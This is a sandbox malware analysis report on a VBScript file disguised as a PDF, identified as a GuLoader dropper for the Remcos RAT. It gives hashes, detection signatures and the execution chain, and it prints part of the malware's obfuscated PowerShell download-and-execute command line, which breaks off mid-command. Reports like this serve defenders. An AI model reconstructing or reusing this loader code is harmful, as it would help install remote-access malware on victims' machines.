Windows Analysis Report
18000012550_20240930_0078864246#U00b7pdf.vbs
Overview
General Information
Sample name: | 18000012550_20240930_0078864246#U00b7pdf.vbs (renamed because original name is a hash value) |
Original sample name: | 18000012550_20240930_0078864246pdf.vbs |
Analysis ID: | 1523161 |
MD5: | 89985981616f5fdef265814322d9735d |
SHA1: | a7a505cea8373907fec133bf34d8d38e86e4dfb2 |
SHA256: | 701bac7c15873d9eadaf8a70ca969adb5d3036421f1872cc706adafc51f7f751 |
Tags: | vbs, user-abuse_ch |
Infos: | |
Detection
Remcos, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7676 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18000012550_20240930_0078864246#U00b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- powershell.exe (PID: 7796 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "<#Akaniac eae Herefo rds Skifer tavles #>; $Tennisalb ue='Landgr nse';<#tal lerkenret Gravkers B andonion # >;$Unvicar ious156=$h ost.Privat eData;If ( $Unvicario us156) {$S anitetsart ikel++;}fu nction Run dholts($Af fectationi st){$Blasf emiernes=$ Hittebarne ts+$Affect ationist.L ength-$San itetsartik el;for( $F astendes=5 ;$Fastende s -lt $Bla sfemiernes ;$Fastende s+=6){$Com posersatse rne+=$Affe ctationist [$Fastende s];}$Compo sersatsern e;}functio n Katedres ($threadli ke){ . ($ Absoluthed ) ($thread like);}$Ox yhemocyani n=Rundholt s 'Pa opMR ach oBarne z ormi Con lPtolel S yntaCompo/ Nonse5 Rhe o.Netw 0 O psi Tvanm( ,lyveWUnem bib,eotn P asadPostco Ou,dew Una rs Dagb Mu ssoNDvaleT Nymp. Spro s1Alp n0A ton.Ji ga0 Runds; Mye l LandiWMa lniiL thon Unmud6Pr,s e4 Spek;Ti lba Udloex Syste6 ann e4Ignor; U nig RejmrG oalpv awki : arto1Maa le2dogto1P upil.Outbl 0Sem h)Sl, ms Shr wGB redleNdhav cd uidk ru nco,aser/P .wer2Cenes 0Milje1Tal le0Sikke0 Dybt1Over 0 brun1Mi ia nonreFS erviiTombo rUf gleuds myfTormeo BathxSamle /Gdann1Til l 2Blemi1S tipe.Bookn 0Sgete ';$ Paahngsmot ors=Rundho lts 'Ci.ar uTrv eSR.c ereApostr. 
amme-Evalu aVoka g Tu rgEPerboNR edisTPhyto ';$Sympat isrers=Run dholts 'Ab oithUdp,nt SmaratXant hpfuldbsG dro:P aco/ sc ot/Besi nd uachrHv idei Opulv No pheAfla s.Hy,ergIn foro Hurko StoregLabi ll bilre s lv.Pteroc RytmoPidd lm Bi l/Sp orvu Anacc Indre?Data oeSti fxma terp Yde o OpgavrFals ktSwap = l yndPlasho SupewR.pet nGrofelTj lko EcodaS kriddAmuei &.orsgiK s sedR sso= Inde1Inse 6u,stoKSub brU Ha,pqS .rimagloos QRegel_Gen neXsuper6L odgiz S,ur b ysfuB Im puHMu,tiAC onteGV nst N I manKre dis Stude Da.awurdyp u B les.il atwForedUB awdsAVerba ZHjttax Kl oat Pr.cxS olodG Ball v Fags7 Pa pn ';$afri mninger=Ru ndholts ' dies> Iamb ';$Absolu thed=Rundh olts 'Inda diRekruEDi ssex Gyro ';$Fastend esnconsult able='Misa ppropriati ng';$Newfa ngle='\For svarsminis ters.Sca'; Katedres ( Rundholts 'Rbest$Tie nngLetmelK onomo ubcu bTrommaSlu gglGaade:O vermMJewbi iEarlilSdm eflTr,ppiG rilloLodre n fmateBys terPrivi=T oupe$ Asse eRotatnTru stvHelv :F asefaHoa.c p .apip di urdStaala. alketDieth a Manu+Dat ak$H terNO utbleUd,pa w dis.f Sc amast genR ep.igLse.a l Crabe Pr el ');Kate dres (Rund holts 'Grn se$Sinu gS .blel.esta oSamarbRef uea Min lS ema.:Va.so PStro aSka lklTechnaS krabvAtomv eRigsgrGal .eeRema,sB i al=Hornb $IriziSTes tiyReim,mU nm sp oddv ave,rttSoc iaiUnsubs Indlr Udbr eErfarrFol kesAlter.S hrins Ag.r pBild,lBru gsi Fllet Gge (Hjemk $ SperaPus lifInt rr SprgiEn.an mHusbenFat heiRicarnS kandg shar eSt,icrOve rr)Di mi ' );Katedres (Rundholt s 'Kn wf[F orthN Syge